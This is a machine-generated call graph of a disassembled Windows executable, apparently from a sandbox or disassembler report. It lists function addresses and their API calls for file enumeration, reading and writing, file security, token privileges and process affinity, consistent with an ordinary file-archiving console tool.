26607 98a5c0 26600->26607 26605 9426a0 fputs 26601->26605 26602->26593 26603->26595 26610 9426a0 fputs 26604->26610 26611 98a245 26605->26611 26608 98a5ca _CxxThrowException 26606->26608 26609 98a5e7 free 26606->26609 26612 9866a8 30 API calls 26607->26612 26608->26609 26613 98a605 26609->26613 26614 98a626 free 26609->26614 26615 98a2c0 26610->26615 26616 942300 fputc 26611->26616 26612->26606 26617 98a609 free 26613->26617 26618 98a63c 26614->26618 26619 942300 fputc 26615->26619 26620 98a24d fputs 26616->26620 26617->26614 26617->26617 26623 987080 6 API calls 26618->26623 26621 98a2c8 26619->26621 26622 9426a0 fputs 26620->26622 26621->26549 26627 942300 fputc 26621->26627 26624 98a26d 26622->26624 26626 98a64a 26623->26626 26625 942300 fputc 26624->26625 26625->26586 26628 94182c free free free free free 26626->26628 26629 98a2d5 26627->26629 26630 98a658 26628->26630 26631 98291c 11 API calls 26629->26631 26632 987f50 61 API calls 26630->26632 26631->26591 26633 98a666 26632->26633 26634 98a6a8 free 26633->26634 26636 98a693 free free 26633->26636 26635 98a6b8 26634->26635 26636->26633 26637->26481 26639 98059a 26638->26639 26640 98058a 26638->26640 26642 943208 26639->26642 26713 942c78 malloc _CxxThrowException free 26640->26713 26714 942130 malloc 26642->26714 26645 9638e8 26717 961700 26645->26717 26650 963979 26730 963864 13 API calls 26650->26730 26652 963a27 26742 963864 13 API calls 26652->26742 26657 963992 26657->26652 26663 942130 2 API calls 26657->26663 26731 9609e0 6 API calls 26657->26731 26732 943314 26657->26732 26735 94b8f0 26657->26735 26663->26657 26713->26639 26715 942155 26714->26715 26716 94213f _CxxThrowException 26714->26716 26715->26645 26716->26715 26743 951d04 GetCurrentProcess 26717->26743 26720 96373c 26727 96376d 26720->26727 26729 963819 26720->26729 26722 963828 26866 960c24 98 API calls 26722->26866 26723 961678 malloc _CxxThrowException memmove memmove free 26723->26727 26725 96381b memmove 26725->26650 26725->26657 26727->26723 26727->26729 26753 9624c0 26727->26753 26865 960a58 10 API calls 26729->26865 26731->26657 26733 942fbc 2 API calls 26732->26733 26734 943329 memmove 26733->26734 26734->26657 26736 94b945 free 26735->26736 26737 94b907 26735->26737 26736->26657 26738 942130 2 API calls 26737->26738 26739 94b91b 26738->26739 26740 94b924 memmove 26739->26740 26741 94b937 free 26739->26741 26740->26741 26741->26736 26744 951d25 CloseHandle 26743->26744 26745 951d3b OpenProcessToken 26743->26745 26744->26745 26746 951d52 LookupPrivilegeValueW 26745->26746 26747 951d9d 26745->26747 26746->26747 26748 951d7f AdjustTokenPrivileges 26746->26748 26750 951da7 CloseHandle 26747->26750 26751 951dad 26747->26751 26748->26747 26749 951db1 GetLastError 26748->26749 26749->26751 26752 951dc6 CloseHandle 26749->26752 26750->26751 26751->26720 26752->26751 26754 962508 26753->26754 26867 9600bc 26754->26867 26756 963484 free 26756->26725 26756->26727 26757 9632fd 26758 943208 2 API calls 26757->26758 26759 963316 26758->26759 26980 947df4 26759->26980 26760 9630f6 26978 94881c 14 API calls 26760->26978 26762 963002 26767 963059 free 26762->26767 26763 962529 26763->26756 26774 96306a 26763->26774 26843 962592 26763->26843 26766 963327 26771 943208 2 API calls 26766->26771 26767->26756 26768 94318c 4 API calls 26833 962bfc 26768->26833 26769 96320f 26770 96326b 26769->26770 26776 9632d6 free free 26769->26776 26772 9632ec free 26770->26772 26775 963343 26771->26775 26772->26756 26773 943314 3 API calls 26812 963119 26773->26812 26774->26757 26774->26760 26983 947e80 41 API calls 26775->26983 26776->26769 26777 943208 2 API calls 26777->26843 26780 943208 2 API calls 26780->26833 26781 96326d free 26781->26770 26783 963282 26781->26783 26782 96342c 26986 960084 GetLastError 26782->26986 26783->26770 26789 96329b free free 26783->26789 26786 96345c free 26788 96346a free 26786->26788 26787 963437 26790 96344d free 26787->26790 26791 96343d free 26787->26791 26987 94794c 26788->26987 26789->26783 26790->26788 26799 963496 free 26791->26799 26792 9600f0 8 API calls 26792->26833 26794 943208 2 API calls 26794->26812 26802 94794c FindClose 26799->26802 26800 943404 4 API calls 26800->26833 26801 9600bc 30 API calls 26819 963361 26801->26819 26802->26756 26803 943404 4 API calls 26803->26812 26804 9634b4 free free 26807 94794c FindClose 26804->26807 26805 9633dd free 26805->26819 26806 947ebc 90 API calls 26806->26833 26807->26756 26809 963488 free 26809->26799 26812->26769 26812->26773 26812->26781 26812->26794 26812->26803 26817 963214 free free 26812->26817 26818 9631e3 free free 26812->26818 26979 961db4 319 API calls 26812->26979 26813 9626dc free free 26813->26843 26814 962c0a free free 26814->26767 26815 943208 2 API calls 26815->26819 26816 962fa8 free 26822 96303a free free 26816->26822 26823 962fba free free 26816->26823 26817->26772 26824 96323d 26817->26824 26818->26769 26818->26812 26819->26782 26819->26786 26819->26801 26819->26804 26819->26805 26819->26809 26819->26815 26984 961db4 319 API calls 26819->26984 26985 947e80 41 API calls 26819->26985 26820 962747 free free 26820->26843 26821 962c28 free free 26821->26767 26822->26767 26823->26833 26824->26770 26830 963256 free free 26824->26830 26826 962f94 free free 26826->26833 26827 962e66 free free 26827->26833 26828 94b8f0 malloc _CxxThrowException memmove free 26828->26843 26830->26824 26831 96301f free free 26831->26767 26832 962efb free free 26832->26833 26833->26762 26833->26768 26833->26780 26833->26792 26833->26800 26833->26806 26833->26816 26833->26826 26833->26827 26833->26831 26833->26832 26835 963004 free free 26833->26835 26836 962e9e free free 26833->26836 26975 943348 malloc _CxxThrowException free 26833->26975 26976 960084 GetLastError 26833->26976 26977 961890 319 API calls 26833->26977 26835->26767 26836->26833 26837 962810 free free free 26837->26843 26838 96287a free 26838->26843 26839 9627fc free free 26839->26843 26840 962866 free free 26840->26843 26843->26777 26843->26813 26843->26814 26843->26820 26843->26821 26843->26828 26843->26833 26843->26837 26843->26838 26843->26839 26843->26840 26845 962c46 free free 26843->26845 26846 962c64 free free 26843->26846 26847 962949 free free 26843->26847 26848 962a64 free free 26843->26848 26850 942130 malloc _CxxThrowException 26843->26850 26853 943314 malloc _CxxThrowException memmove 26843->26853 26855 962ce2 26843->26855 26857 962ba0 free free free 26843->26857 26858 962c82 26843->26858 26860 962a4f free 26843->26860 26862 962b8c free free 26843->26862 26864 962a33 free free 26843->26864 26871 94318c 26843->26871 26874 9600f0 26843->26874 26880 947ebc 26843->26880 26959 943348 malloc _CxxThrowException free 26843->26959 26960 943404 26843->26960 26966 960084 GetLastError 26843->26966 26967 9450bc 11 API calls 26843->26967 26968 9603bc 14 API calls 26843->26968 26969 9614dc 12 API calls 26843->26969 26970 960554 59 API calls 26843->26970 26971 961988 87 API calls 26843->26971 26972 9447a8 CharUpperW CharUpperW wcscmp 26843->26972 26973 95710c malloc _CxxThrowException memmove free 26843->26973 26974 961890 319 API calls 26843->26974 26845->26767 26846->26767 26847->26843 26848->26843 26850->26843 26853->26843 26856 962d21 free free free 26855->26856 26861 962d0d free free 26855->26861 26856->26767 26857->26843 26859 962cb8 free free free 26858->26859 26863 962ca4 free free 26858->26863 26859->26767 26860->26843 26861->26855 26862->26843 26863->26858 26864->26843 26865->26722 26866->26725 26868 9600e4 26867->26868 26869 9600d0 26867->26869 26868->26763 26990 9805a0 26869->26990 27064 94312c 26871->27064 26873 9431b4 26873->26843 26875 943314 3 API calls 26874->26875 26876 96010f 26875->26876 27070 94362c 26876->27070 26878 96011d 26879 960182 free 26878->26879 26879->26843 26881 947edf 26880->26881 26882 947ee9 26881->26882 26884 947fca 26881->26884 27092 94339c 26882->27092 26890 948253 26884->26890 27104 943274 26884->27104 26885 947f8c 27098 9491dc 26885->27098 26886 947f14 26886->26885 26891 947f2e 26886->26891 26888 947ff9 26892 943274 3 API calls 26888->26892 26895 948306 26890->26895 26897 948296 26890->26897 27097 94abb0 GetModuleHandleW GetProcAddress GetDiskFreeSpaceW 26891->27097 26905 948007 26892->26905 26901 948326 26895->26901 26902 94831e 26895->26902 26918 948377 26895->26918 26896 947f75 26896->26885 26898 947f79 26896->26898 27112 947d4c 26897->27112 26899 947fc3 26898->26899 26899->26843 26912 9482e7 26901->26912 27078 947978 26901->27078 26907 947d4c 39 API calls 26902->26907 26913 948051 26905->26913 27108 943670 malloc _CxxThrowException memmove free _CxxThrowException 26905->27108 26907->26901 26909 9482b8 26910 94339c 4 API calls 26909->26910 26910->26912 26911 94794c FindClose 26911->26899 26912->26911 26914 9480b1 26913->26914 26916 948075 26913->26916 26915 947ebc 72 API calls 26914->26915 26919 9480b9 26915->26919 26917 9480af 26916->26917 26920 943404 4 API calls 26916->26920 26923 943314 3 API calls 26917->26923 26918->26901 26921 943274 3 API calls 26918->26921 26919->26917 26922 94823e free free 26919->26922 26920->26917 26929 9483b9 26921->26929 26922->26890 26924 9480e3 26923->26924 26925 943208 2 API calls 26924->26925 26926 9480ee 26925->26926 27109 947ce0 44 API calls 26926->27109 26927 947978 39 API calls 26930 948435 26927->26930 26929->26927 26931 94847c 26930->26931 26932 948439 wcscmp 26930->26932 26935 947d4c 39 API calls 26931->26935 26932->26931 26934 948459 26932->26934 26933 94815a free free 26936 94794c FindClose 26933->26936 26939 94339c 4 API calls 26934->26939 26940 94848c 26935->26940 26941 948179 free 26936->26941 26937 94818a SetLastError free free 26942 94794c FindClose 26937->26942 26943 94846b free 26939->26943 26944 9484b3 26940->26944 26949 9484a7 free 26940->26949 26945 94822d free 26941->26945 26946 9481b5 free 26942->26946 26943->26912 26950 94339c 4 API calls 26944->26950 26945->26899 26946->26945 26947 9481c3 26953 94362c 6 API calls 26947->26953 26948 94812a free 26951 943208 2 API calls 26948->26951 26949->26901 26952 9484e4 free 26950->26952 26954 948106 26951->26954 26952->26912 26955 9481ee free free 26953->26955 26954->26933 26954->26937 26954->26947 26954->26948 27110 942748 CharUpperW CharUpperW 26954->27110 27111 947ce0 44 API calls 26954->27111 26957 94794c FindClose 26955->26957 26958 94821e free 26957->26958 26958->26945 26959->26843 26961 943451 26960->26961 26962 943418 26960->26962 26961->26843 26963 94343c memmove 26962->26963 26964 942130 2 API calls 26962->26964 26963->26961 26965 94342b free 26964->26965 26965->26963 26966->26843 26967->26843 26968->26843 26969->26843 26970->26843 26971->26843 26972->26843 26973->26843 26974->26843 26975->26833 26976->26833 26977->26833 26978->26812 26979->26812 26981 943404 4 API calls 26980->26981 26982 947e06 26981->26982 26982->26766 26983->26819 26984->26819 26985->26819 26986->26787 26988 947968 26987->26988 26989 94795b FindClose 26987->26989 26988->26756 26989->26988 26991 9805de 26990->26991 26992 9805b0 26990->26992 26991->26868 26993 943404 4 API calls 26992->26993 26994 9805d6 26993->26994 26996 98b480 26994->26996 26997 98b49e GetTickCount 26996->26997 26998 98b4a7 26996->26998 26997->26998 26999 98b50c 26998->26999 27002 98b7aa 26998->27002 27003 98b4d8 strcmp 26998->27003 26999->27002 27037 98b264 26999->27037 27002->26991 27003->26999 27004 98b4ec 27003->27004 27004->26999 27006 98b4f7 wcscmp 27004->27006 27005 98b575 27043 942cdc 27005->27043 27006->26999 27007 98b55e strcmp 27007->27002 27007->27005 27009 98b584 27011 98b5c8 27009->27011 27048 942db8 27009->27048 27010 98b714 27013 98b72c 27010->27013 27014 98b71c strcmp 27010->27014 27018 98b5fd 27011->27018 27052 942e04 malloc _CxxThrowException memmove free _CxxThrowException 27011->27052 27017 98b1c8 7 API calls 27013->27017 27014->27013 27016 98b76a 27014->27016 27020 942cdc 3 API calls 27016->27020 27021 98b736 fputs 27017->27021 27018->27010 27019 943404 4 API calls 27018->27019 27022 98b646 27019->27022 27023 98b79a 27020->27023 27024 98b75e 27021->27024 27025 98b752 27021->27025 27053 942438 9 API calls 27022->27053 27028 943404 4 API calls 27023->27028 27027 942cdc 3 API calls 27024->27027 27058 9422e4 fflush 27025->27058 27027->27016 27028->27002 27030 98b6f0 27057 942e04 malloc _CxxThrowException memmove free _CxxThrowException 27030->27057 27032 943404 4 API calls 27035 98b663 27032->27035 27035->27030 27035->27032 27054 9438c8 memmove 27035->27054 27055 943a64 6 API calls 27035->27055 27056 942438 9 API calls 27035->27056 27038 98b27e 27037->27038 27039 98b2a8 strlen 27038->27039 27042 98b2c9 27039->27042 27040 942db8 5 API calls 27041 98b305 27040->27041 27041->27005 27041->27007 27042->27040 27044 942cf0 27043->27044 27045 942d11 27043->27045 27044->27045 27046 942130 2 API calls 27044->27046 27045->27009 27047 942d00 free 27046->27047 27047->27045 27049 942dcd 27048->27049 27049->27049 27059 942b9c 27049->27059 27052->27018 27053->27035 27054->27035 27055->27035 27056->27035 27057->27010 27058->27024 27060 942bc3 27059->27060 27061 942bae 27059->27061 27060->27011 27063 942a9c malloc _CxxThrowException memmove free _CxxThrowException 27061->27063 27063->27060 27067 942fbc 27064->27067 27068 942130 2 API calls 27067->27068 27069 942fda memmove memmove 27068->27069 27069->26873 27073 943004 27070->27073 27074 943016 27073->27074 27075 94302b memmove 27073->27075 27077 942ef4 malloc _CxxThrowException memmove free _CxxThrowException 27074->27077 27075->26878 27077->27075 27079 94794c FindClose 27078->27079 27080 94799b 27079->27080 27081 9479b2 FindFirstFileW 27080->27081 27082 9479c3 27080->27082 27086 947a13 27080->27086 27081->27082 27083 947a0d 27082->27083 27085 943208 2 API calls 27082->27085 27084 94339c 4 API calls 27083->27084 27083->27086 27084->27086 27087 9479d7 27085->27087 27086->26912 27123 94a7ec 27087->27123 27090 9479f0 FindFirstFileW 27091 947a03 free 27090->27091 27091->27083 27093 9433b2 27092->27093 27094 9433e2 memmove 27093->27094 27095 942130 2 API calls 27093->27095 27094->26886 27096 9433d1 free 27095->27096 27096->27094 27097->26896 27225 949164 27098->27225 27101 9489d8 27102 9489e7 CloseHandle 27101->27102 27103 9489f4 27101->27103 27102->27103 27103->26899 27105 943289 27104->27105 27106 942fbc 2 API calls 27105->27106 27107 94329f memmove 27106->27107 27107->26888 27108->26913 27109->26954 27110->26954 27111->26954 27113 947d64 27112->27113 27114 947d79 27113->27114 27115 947d6b GetFileAttributesW 27113->27115 27116 947dc5 27114->27116 27117 943208 2 API calls 27114->27117 27115->27114 27115->27116 27116->26901 27116->26909 27118 947d87 27117->27118 27119 94a7ec 35 API calls 27118->27119 27120 947d9c 27119->27120 27121 947da0 GetFileAttributesW free 27120->27121 27122 947dbb free 27120->27122 27121->27116 27122->27116 27128 94a224 27123->27128 27126 9479ec 27126->27090 27126->27091 27127 94339c 4 API calls 27127->27126 27129 94a257 27128->27129 27130 94a25e 27128->27130 27129->27126 27129->27127 27130->27129 27131 94a363 27130->27131 27138 94a28c 27130->27138 27132 94a44b 27131->27132 27134 94a37c 27131->27134 27133 94a618 27132->27133 27135 94a461 27132->27135 27136 943274 3 API calls 27133->27136 27134->27135 27140 94a389 27134->27140 27137 943208 2 API calls 27135->27137 27139 94a626 27136->27139 27141 94a46b 27137->27141 27138->27129 27142 943274 3 API calls 27138->27142 27146 943274 3 API calls 27139->27146 27143 943274 3 API calls 27140->27143 27217 949f80 malloc _CxxThrowException free memmove GetCurrentDirectoryW 27141->27217 27145 94a2bb 27142->27145 27147 94a396 27143->27147 27153 94a2de 27145->27153 27154 94a2cf free 27145->27154 27149 94a644 27146->27149 27156 943274 3 API calls 27147->27156 27148 94a476 27150 94a47a free 27148->27150 27151 94a48b 27148->27151 27223 949fd8 memmove 27149->27223 27150->27129 27165 94a4ab 27151->27165 27178 94a4c6 27151->27178 27157 943274 3 API calls 27153->27157 27154->27129 27155 94a64f 27159 94a653 free free 27155->27159 27160 94a66c 27155->27160 27161 94a3c2 27156->27161 27158 94a2ec 27157->27158 27214 949fd8 memmove 27158->27214 27159->27129 27224 943670 malloc _CxxThrowException memmove free _CxxThrowException 27160->27224 27215 949fd8 memmove 27161->27215 27175 94a4b7 free 27165->27175 27176 94a4cf 27165->27176 27166 94a2f7 27169 94a317 27166->27169 27170 94a2fb free free 27166->27170 27167 94a67b 27173 94362c 6 API calls 27167->27173 27168 94a3cd 27171 94a3d1 free free 27168->27171 27172 94a3ed 27168->27172 27177 94362c 6 API calls 27169->27177 27170->27129 27171->27129 27216 943670 malloc _CxxThrowException memmove free _CxxThrowException 27172->27216 27179 94a69d 27173->27179 27175->27129 27181 943208 2 API calls 27176->27181 27182 94a339 27177->27182 27178->27176 27186 94a609 free 27178->27186 27187 94a502 27178->27187 27183 94362c 6 API calls 27179->27183 27180 94a3fc 27189 94362c 6 API calls 27180->27189 27184 94a538 27181->27184 27185 94362c 6 API calls 27182->27185 27188 94a6aa free free 27183->27188 27191 94a56b 27184->27191 27194 94a545 27184->27194 27192 94a346 free free 27185->27192 27186->27129 27187->27176 27199 94a518 free 27187->27199 27188->27129 27190 94a421 27189->27190 27193 94362c 6 API calls 27190->27193 27195 94339c 4 API calls 27191->27195 27192->27129 27196 94a42e free free 27193->27196 27218 9435d8 6 API calls 27194->27218 27198 94a569 27195->27198 27196->27129 27220 949fd8 memmove 27198->27220 27199->27129 27200 94a55c 27219 9435d8 6 API calls 27200->27219 27203 94a583 27204 94a587 free free 27203->27204 27205 94a5a3 27203->27205 27204->27129 27206 94a5b3 27205->27206 27221 943670 malloc _CxxThrowException memmove free _CxxThrowException 27205->27221 27222 949a80 malloc _CxxThrowException memmove 27206->27222 27209 94a5c8 27210 94362c 6 API calls 27209->27210 27211 94a5d4 free 27210->27211 27212 94362c 6 API calls 27211->27212 27213 94a5ec free free 27212->27213 27213->27129 27214->27166 27215->27168 27216->27180 27217->27148 27218->27200 27219->27198 27220->27203 27221->27206 27222->27209 27223->27155 27224->27167 27230 948cdc 27225->27230 27227 94918d 27242 948f18 12 API calls 27227->27242 27229 947fa2 27229->27101 27231 9489d8 CloseHandle 27230->27231 27233 948d07 27231->27233 27232 948d0d 27232->27227 27233->27232 27234 948d36 CreateFileW 27233->27234 27235 948d5a 27233->27235 27234->27235 27235->27232 27236 943208 2 API calls 27235->27236 27237 948d6e 27236->27237 27238 94a7ec 35 API calls 27237->27238 27239 948d83 27238->27239 27240 948d87 CreateFileW 27239->27240 27241 948dad free 27239->27241 27240->27241 27241->27232 27242->27229 27286 9749b0 27306 96cd8c 27286->27306 27288 943208 2 API calls 27290 9749e7 27288->27290 27291 943208 2 API calls 27290->27291 27292 9749f2 27291->27292 27296 974a25 27292->27296 27313 946e30 27292->27313 27297 974a57 free free 27296->27297 27303 974a72 27296->27303 27298 974b22 27297->27298 27299 974b0a free free 27299->27298 27300 94318c 4 API calls 27300->27303 27301 942130 2 API calls 27301->27303 27302 943314 3 API calls 27302->27303 27303->27299 27303->27300 27303->27301 27303->27302 27304 94b8f0 4 API calls 27303->27304 27305 974ade free 27304->27305 27305->27303 27307 943208 2 API calls 27306->27307 27308 96cddd 27307->27308 27309 943208 2 API calls 27308->27309 27310 96cdf0 27309->27310 27311 943208 2 API calls 27310->27311 27312 96cdfe 27311->27312 27312->27288 27314 946e47 27313->27314 27315 946e59 27314->27315 27316 94339c 4 API calls 27314->27316 27317 94339c 4 API calls 27315->27317 27316->27315 27318 946e73 27317->27318 27319 96cf80 27318->27319 27320 943404 4 API calls 27319->27320 27321 96cfa1 27320->27321 27322 94318c 4 API calls 27321->27322 27323 96cfb2 27322->27323 27324 947ebc 90 API calls 27323->27324 27325 96cfbf free 27324->27325 27326 96cfd2 _CxxThrowException 27325->27326 27327 96cfec 27325->27327 27326->27327 27328 96d02a 27327->27328 27329 96d015 free free 27327->27329 27328->27296 27329->27327 27330 94e8fc 27331 94e95b 27330->27331 27332 94e91f 27330->27332 27332->27331 27334 94ce1c 27332->27334 27335 94ce3c 27334->27335 27336 94cfdc 27335->27336 27337 94cf96 27335->27337 27340 94ce69 27335->27340 27341 94cf63 27335->27341 27343 94cf1e 27335->27343 27347 94cf85 GetLastError 27335->27347 27350 948af4 ReadFile 27335->27350 27351 948a60 27335->27351 27338 94d020 GetLastError 27336->27338 27336->27340 27339 94cfa2 memmove 27337->27339 27337->27340 27338->27340 27339->27340 27340->27332 27341->27336 27346 948a60 2 API calls 27341->27346 27343->27335 27349 94d019 27343->27349 27356 98d480 VirtualAlloc 27343->27356 27348 94cf81 27346->27348 27347->27340 27348->27336 27348->27347 27349->27340 27350->27335 27352 948a70 27351->27352 27353 948a83 SetFilePointer 27351->27353 27352->27353 27354 948ab0 27353->27354 27355 948aa6 GetLastError 27353->27355 27354->27335 27355->27354 27356->27343 27357 94f71c 27392 941610 27357->27392 27360 94f774 _isatty _isatty _isatty 27366 94f7c4 27360->27366 27362 94f762 _CxxThrowException 27362->27360 27363 94f89f 27407 94ac74 GetCurrentProcess OpenProcessToken 27363->27407 27366->27363 27414 9602a0 6 API calls 27366->27414 27367 94ac74 6 API calls 27368 94f936 27367->27368 27370 94f9dd 27368->27370 27372 94f965 wcscmp 27368->27372 27373 94f95e 27368->27373 27374 94fa94 27370->27374 27377 942bc8 2 API calls 27370->27377 27371 94f8d4 _CxxThrowException 27371->27363 27372->27373 27375 94f979 27372->27375 27416 94ad0c GetModuleHandleW GetProcAddress 27373->27416 27375->27373 27380 94f98e 27375->27380 27379 94fa0a 27377->27379 27378 94f9c0 27378->27370 27417 98d4c0 GetModuleHandleW GetProcAddress 27378->27417 27418 942d34 malloc _CxxThrowException free 27379->27418 27415 9602a0 6 API calls 27380->27415 27384 94fa18 27391 94fa75 GetCurrentProcess SetProcessAffinityMask free 27384->27391 27419 9602a0 6 API calls 27384->27419 27385 94f9c9 27388 94ac74 6 API calls 27385->27388 27386 94f9a2 _CxxThrowException 27386->27373 27390 94f9d7 27388->27390 27389 94fa63 _CxxThrowException 27389->27391 27390->27370 27391->27374 27393 941667 27392->27393 27394 941693 27392->27394 27393->27394 27397 94167f free free 27393->27397 27395 9416c9 27394->27395 27398 9416c1 free 27394->27398 27396 942130 2 API calls 27395->27396 27399 9416e1 27396->27399 27397->27393 27398->27395 27400 942130 2 API calls 27399->27400 27401 943314 3 API calls 27399->27401 27402 94b8f0 4 API calls 27399->27402 27404 9417bf 27399->27404 27406 9417bd 27399->27406 27420 941364 8 API calls 27399->27420 27400->27399 27401->27399 27402->27399 27405 943404 4 API calls 27404->27405 27405->27406 27406->27360 27413 9602a0 6 API calls 27406->27413 27408 94ad00 27407->27408 27409 94ac9f LookupPrivilegeValueW 27407->27409 27408->27367 27410 94acf5 CloseHandle 27409->27410 27411 94acb3 AdjustTokenPrivileges 27409->27411 27410->27408 27411->27410 27412 94acea GetLastError 27411->27412 27412->27410 27413->27362 27414->27371 27415->27386 27416->27378 27417->27385 27418->27384 27419->27389 27420->27399 27421 96f13e 27423 96f144 27421->27423 27466 94450c 27423->27466 27425 943208 2 API calls 27427 96f1d6 27425->27427 27426 96f206 27429 942130 2 API calls 27426->27429 27430 96f248 27426->27430 27427->27426 27428 94339c 4 API calls 27427->27428 27428->27426 27429->27430 27470 98c7d4 27430->27470 27433 96facb 27434 942130 2 API calls 27433->27434 27450 96faf9 27433->27450 27434->27450 27436 970028 free free free free 27440 972d6b free 27436->27440 27437 96fa90 27464 94c90c 3 API calls 27437->27464 27438 96fa6e free free free 27438->27440 27442 973702 27440->27442 27441 96faa2 27441->27433 27443 96faa9 free free free 27441->27443 27443->27440 27445 970034 free free free free 27445->27440 27446 97005f free free free free 27446->27440 27447 97008a free free free free 27447->27440 27449 9700c9 free free free free 27449->27440 27450->27436 27450->27445 27450->27446 27450->27447 27450->27449 27454 97010e free free free free 27450->27454 27455 970192 free free free free 27450->27455 27457 943404 malloc _CxxThrowException free memmove 27450->27457 27458 9701d4 free free free free 27450->27458 27460 970213 free free free free 27450->27460 27462 97014d free free free free 27450->27462 27483 96e0e8 27450->27483 27487 96b58c 6 API calls 27450->27487 27454->27440 27455->27440 27457->27450 27458->27440 27460->27440 27462->27440 27464->27441 27467 944529 27466->27467 27468 943274 3 API calls 27467->27468 27469 94453c 27468->27469 27469->27425 27471 96f2c8 27470->27471 27472 98c7ea 27470->27472 27471->27433 27477 94c90c 27471->27477 27473 942130 2 API calls 27472->27473 27474 98c7fe 27473->27474 27475 98c81a free 27474->27475 27476 98c807 memmove 27474->27476 27475->27471 27476->27475 27478 94c920 27477->27478 27482 94c932 27477->27482 27479 948a60 2 API calls 27478->27479 27478->27482 27480 94c97c 27479->27480 27481 94c995 GetLastError 27480->27481 27480->27482 27481->27482 27482->27437 27482->27438 27486 96e110 27483->27486 27484 96e120 27484->27450 27486->27484 27488 975988 22 API calls 27486->27488 27487->27450 27488->27484 27489 95251c 27491 95255c 27489->27491 27495 952543 27489->27495 27497 9523ec 27491->27497 27492 952691 27492->27495 27507 96c59c 27492->27507 27494 9525c5 27494->27492 27494->27495 27496 952662 SetFileSecurityW 27494->27496 27496->27492 27498 952408 27497->27498 27505 952401 27497->27505 27517 948bb0 SetFileTime 27498->27517 27500 952489 27501 9524d2 27500->27501 27523 948c98 27500->27523 27518 94cb34 27501->27518 27505->27494 27508 96c5e9 27507->27508 27509 96c655 27508->27509 27514 96c5fa 27508->27514 27516 96c5ef 27508->27516 27510 94ae2c VariantClear 27509->27510 27513 96c61b 27510->27513 27512 96c61f 27515 94ae2c VariantClear 27512->27515 27513->27495 27514->27512 27514->27516 27515->27513 27529 94ae2c 27516->27529 27517->27500 27519 9489d8 CloseHandle 27518->27519 27520 94cb43 27519->27520 27521 94cb56 27520->27521 27522 94cb49 GetLastError 27520->27522 27521->27505 27522->27521 27524 948a60 2 API calls 27523->27524 27525 948cb3 27524->27525 27526 948cc4 SetEndOfFile 27525->27526 27527 948cc0 27525->27527 27526->27527 27527->27501 27528 95211c 13 API calls 27527->27528 27528->27501 27530 94ae36 27529->27530 27531 94ae3a 27529->27531 27530->27513 27533 94add0 VariantClear 27531->27533 27533->27530 27534 94c858 27535 94c865 27534->27535 27536 94c870 27534->27536 27538 94cdf4 27535->27538 27543 94c704 27538->27543 27546 98d4a0 VirtualFree 27543->27546 27545 94c74e 27546->27545 27547 94cb78 27552 948c38 27547->27552 27550 94cba8 GetLastError 27551 94cbb5 27550->27551 27554 948c54 27552->27554 27555 948c87 27554->27555 27556 948bf0 WriteFile 27554->27556 27555->27550 27555->27551 27556->27554 27557 954418 27558 954458 27557->27558 27935 96ec5c 27558->27935 27561 954575 27563 94ae2c VariantClear 27561->27563 27562 954587 27564 9545aa 27562->27564 27565 954596 27562->27565 27642 95457f 27563->27642 27566 94ae2c VariantClear 27564->27566 27567 94ae2c VariantClear 27565->27567 27568 9545c7 27566->27568 27567->27642 27569 954606 27568->27569 27570 954618 27568->27570 27571 94ae2c VariantClear 27569->27571 27572 954640 27570->27572 27573 954620 27570->27573 27571->27642 27575 954647 27572->27575 27576 95463e 27572->27576 27999 9434c0 malloc _CxxThrowException SysStringLen free 27573->27999 27577 94ae2c VariantClear 27575->27577 27578 94ae2c VariantClear 27576->27578 27577->27642 27579 954665 27578->27579 27580 9546a4 27579->27580 27581 954692 27579->27581 27583 9546cc 27580->27583 27584 9546ac 27580->27584 27582 94ae2c VariantClear 27581->27582 27582->27642 27586 9546ca 27583->27586 27587 9546d3 27583->27587 28000 9434c0 malloc _CxxThrowException SysStringLen free 27584->28000 27589 94ae2c VariantClear 27586->27589 27588 94ae2c VariantClear 27587->27588 27588->27642 27592 9546f1 27589->27592 27590 9549c6 27969 96b204 27590->27969 27596 943208 2 API calls 27592->27596 27597 954842 27592->27597 27592->27642 27593 9548b8 27593->27590 28005 944d78 10 API calls 27593->28005 27599 95476e 27596->27599 27597->27593 27606 954890 27597->27606 28003 943918 memmove 27597->28003 27598 96c59c VariantClear 27608 954a03 27598->27608 27601 943208 2 API calls 27599->27601 27603 95478a 27601->27603 27602 95493f 27605 954954 27602->27605 28007 9530dc free free memmove 27602->28007 27610 943208 2 API calls 27603->27610 27607 9663cc 6 API calls 27605->27607 27606->27593 28004 943918 memmove 27606->28004 27614 954963 27607->27614 27609 954a45 27608->27609 27608->27642 28008 954210 29 API calls 27608->28008 27623 954a65 27609->27623 27609->27642 27651 954aad 27609->27651 27616 954798 27610->27616 27611 9548fd 27611->27602 27611->27605 28006 944338 CharUpperW CharUpperW wcscmp 27611->28006 27617 943404 4 API calls 27614->27617 28001 9492d4 malloc _CxxThrowException _CxxThrowException free 27616->28001 27620 954973 free 27617->27620 27618 954aa0 27624 954db2 27618->27624 27625 954c6f 27618->27625 27622 954992 27620->27622 27621 9547c5 27626 95481d free free free 27621->27626 28002 949444 malloc _CxxThrowException memmove memmove 27621->28002 27627 9549c1 free 27622->27627 27631 9549a9 free free 27622->27631 27623->27618 28009 9530dc free free memmove 27623->28009 27637 954de2 27624->27637 27638 954e2c 27624->27638 27624->27642 27632 942130 2 API calls 27625->27632 27645 954c82 27625->27645 27626->27597 27627->27590 27628 954ae1 27628->27642 28011 9530dc free free memmove 27628->28011 27631->27622 27632->27645 27633 9663cc 6 API calls 27643 954cf7 27633->27643 27635 9547e1 27636 943404 4 API calls 27635->27636 27639 9547f1 free 27636->27639 27640 942130 2 API calls 27637->27640 27646 954e70 27638->27646 27647 954e5d 27638->27647 27639->27626 27640->27642 27641 954d65 free 27641->27642 27643->27641 27649 94362c 6 API calls 27643->27649 27645->27633 27652 954e78 27646->27652 27653 9565de 27646->27653 27650 94ae2c VariantClear 27647->27650 27649->27641 27650->27642 27651->27628 27651->27642 28010 944338 CharUpperW CharUpperW wcscmp 27651->28010 27654 94ae2c VariantClear 27652->27654 27655 94ae2c VariantClear 27653->27655 27656 954ea7 27654->27656 27655->27642 27973 951fcc 27656->27973 27659 951fcc VariantClear 27660 954f03 27659->27660 27660->27642 27661 951fcc VariantClear 27660->27661 27662 954f30 27661->27662 27662->27642 27663 96b204 VariantClear 27662->27663 27664 954f5e 27663->27664 27664->27642 27666 954fa7 27664->27666 28012 966484 20 API calls 27664->28012 27667 9550ea 27666->27667 27669 943314 3 API calls 27666->27669 27977 9663cc 27667->27977 27670 954fc5 27669->27670 28013 966154 malloc _CxxThrowException free 